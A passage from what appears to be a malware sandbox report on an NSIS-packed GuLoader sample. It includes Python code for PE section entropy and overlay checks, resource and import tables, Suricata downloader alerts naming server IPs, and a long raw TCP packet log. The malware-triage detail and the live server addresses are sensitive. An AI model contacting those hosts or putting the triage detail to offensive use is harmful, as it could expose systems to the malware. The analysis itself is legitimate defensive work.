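    (".rdata", 0x7000,  0x1370,  0x1400,  5.0714431097950134),
    (".data",  0x9000,  0x20318, 0x600,   3.9955723529870646),
    (".ndata", 0x2a000, 0x1f000, 0x0,     0.0),
    (".rsrc",  0x49000, 0x17fe0, 0x18000, 7.340960013048418),
]
IMAGE_BASE = 0x400000
ENTRYPOINT = 0x40326a
FILE_SIZE = 570_654      # "File size" from the report
HEADER_SIZE = 0x400      # assumption: headers padded to 0x400; the report does not give the first raw offset


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) up to 8.0 (uniform): the measure behind the 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(rva: int, sections=SECTIONS):
    """Name of the section whose virtual range covers rva (the 'Is in Section' column), or None."""
    for name, va, vsize, _raw, _ent in sections:
        if va <= rva < va + vsize:
            return name
    return None


def high_entropy_sections(sections=SECTIONS, threshold=7.0):
    """Sections whose entropy suggests compressed or encrypted content."""
    return [s[0] for s in sections if s[4] >= threshold]


def overlay_size(file_size=FILE_SIZE, sections=SECTIONS, header_size=HEADER_SIZE) -> int:
    """Bytes of the file that belong to neither the headers nor any section: the appended overlay."""
    return file_size - header_size - sum(s[3] for s in sections)


if __name__ == "__main__":
    print("entrypoint lies in", section_for_rva(ENTRYPOINT - IMAGE_BASE))
    print("import directory 0x74bc lies in", section_for_rva(0x74bc))
    print("sections at or above 7 bits/byte:", high_entropy_sections())
    ov = overlay_size()
    print(f"overlay: {ov} bytes, {ov / FILE_SIZE:.0%} of the file")
    print("entropy of 4 KiB of zeros:", shannon_entropy(b"\x00" * 4096))
    print("entropy of one copy of every byte value:", shannon_entropy(bytes(range(256))))
```

Run stand-alone it reports that the entry point and the import directory fall in .text and .rdata, that .rsrc is the only section above 7 bits/byte (driven by the two PNG-encoded icons in the resource table, not by GuLoader), and that about 440 KB, roughly 77% of the file, lies outside every section. A section-only entropy check therefore points at the wrong place for an NSIS sample; the archive in the overlay is what needs to be extracted (7-Zip understands the NSIS container) before the installer script and the dropped files can be examined.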
Resources:

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x493e8 | 0x9978 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9907605375687233
RT_ICON | 0x52d60 | 0x7772 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9867551834652365
RT_ICON | 0x5a4d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.35477178423236516
RT_ICON | 0x5ca80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.3968105065666041
RT_ICON | 0x5db28 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.509594882729211
RT_ICON | 0x5e9d0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.5965703971119134
RT_ICON | 0x5f278 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3908536585365854
RT_ICON | 0x5f8e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.42991329479768786
RT_ICON | 0x5fe48 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5664893617021277
RT_ICON | 0x602b0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.46639784946236557
RT_ICON | 0x60598 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5506756756756757
RT_DIALOG | 0x606c0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x607c0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x608e0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x609a8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x60a08 | 0xa0 | data | English | United States | 0.61875
RT_VERSION | 0x60aa8 | 0x1f8 | data | English | United States | 0.5059523809523809
RT_MANIFEST | 0x60ca0 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447

The two PNG-encoded 256 x 256 icons (ZLIB complexity 0.99) take 0x110ea, about 70 KB, of the 0x17fe0-byte .rsrc section and are what pushes that section's entropy to 7.34; they are already-compressed image data, not a hidden payload. A full icon set up to 256 x 256 is consistent with the double-extension lure flagged in the signatures: with extension hiding on, the icon is what the victim sees, not the .exe.
Imports (DLL: functions):

KERNEL32.dll: SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll: GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll: RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll: ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system: English
Country where language is spoken: United States
Suricata IDS alerts:

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-15T17:21:03.979116+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49928 | 104.168.32.140 | 80 | TCP
2024-11-15T17:21:11.502558+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49967 | 162.55.60.2 | 80 | TCP

Both alerts fire on plain HTTP (port 80) from the sandbox VM to two different servers; the first one is timestamped inside the burst of server-to-client packets on the 49928 flow listed below, i.e. it matched the response headers coming back from 104.168.32.140.
TCP packets (this excerpt covers the 192.168.2.5:49928 to 104.168.32.140:80 flow that raised the first Suricata alert):

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 15, 2024 17:21:03.298316002 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.303875923 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.303941965 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.304069042 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.311132908 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.978981018 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.978998899 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979017019 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979032993 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979052067 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979067087 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979082108 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979115963 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.979116917 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.979116917 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.979116917 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.979163885 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.979178905 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979193926 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979209900 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.979233027 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.979257107 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.984133959 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.984224081 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.984365940 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.984381914 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:03.984409094 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:03.984424114 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.097806931 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.097821951 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.097837925 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.097865105 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.097875118 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.097887993 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.097892046 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.097908020 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.097918987 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.097958088 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.098623037 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.098635912 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.098654985 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.098668098 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.098681927 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.098684072 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.098707914 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.098731995 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.098736048 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.098931074 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.099231005 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.099282026 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.099299908 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.099323988 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.099339962 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.099348068 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.099355936 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.099370956 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.099375010 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.099395990 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.099421024 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.100158930 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.100198030 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.100213051 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.100222111 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.100235939 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.100267887 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.100755930 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.100770950 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.100830078 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.100830078 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.102801085 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.102853060 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.102946043 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.102960110 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.102976084 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.102993965 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.103008032 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.103029966 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.216772079 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.216798067 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.216813087 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.216897964 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.216897964 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217011929 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217029095 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217045069 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217150927 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217150927 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217165947 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217180967 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217196941 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217216969 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217226028 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217241049 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217257023 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217259884 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217272043 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217297077 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217314005 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217325926 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217422009 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.217916012 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217936039 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217952967 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217972040 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.217978001 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.218005896 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
Nov 15, 2024 17:21:04.218031883 CET | 80 | 49928 | 104.168.32.140 | 192.168.2.5
Nov 15, 2024 17:21:04.218197107 CET | 49928 | 80 | 192.168.2.5 | 104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218483925 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218502998 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218516111 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218532085 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218548059 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218625069 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218626022 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218626022 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218626022 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218765974 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218782902 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218799114 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218811035 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218815088 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218832970 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.218844891 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218844891 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218885899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.218885899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219603062 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219619989 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219634056 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219650984 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219659090 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219660044 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219666958 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219692945 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219717026 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219793081 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219810009 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219825983 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219846010 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219887018 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.219933033 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219949961 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219966888 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219984055 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.219999075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220002890 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220015049 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220021009 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220031977 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220040083 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220048904 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220058918 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220076084 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220097065 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220170021 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220186949 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220207930 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220211983 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220222950 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220225096 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220242977 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.220248938 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.220258951 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.221163988 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.221898079 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.221914053 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.221940041 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.221959114 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335721970 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335776091 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335788965 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335805893 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335823059 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335834980 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335854053 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335865021 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335880995 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335891008 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335928917 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335930109 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335947990 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335963964 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.335983038 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.335999966 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336049080 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336065054 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336081028 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336095095 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336105108 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336137056 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336276054 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336321115 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336477041 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336493015 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336508989 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336524010 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336525917 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336539030 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336540937 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336555958 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336563110 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336585045 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336612940 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336637020 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336651087 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336699963 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336904049 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336920977 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336936951 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.336956024 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336966991 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.336993933 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337153912 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337169886 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337184906 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337199926 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337210894 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337215900 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337230921 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337246895 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337249994 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337259054 CET4992880192.168.2.5104.168.32.140
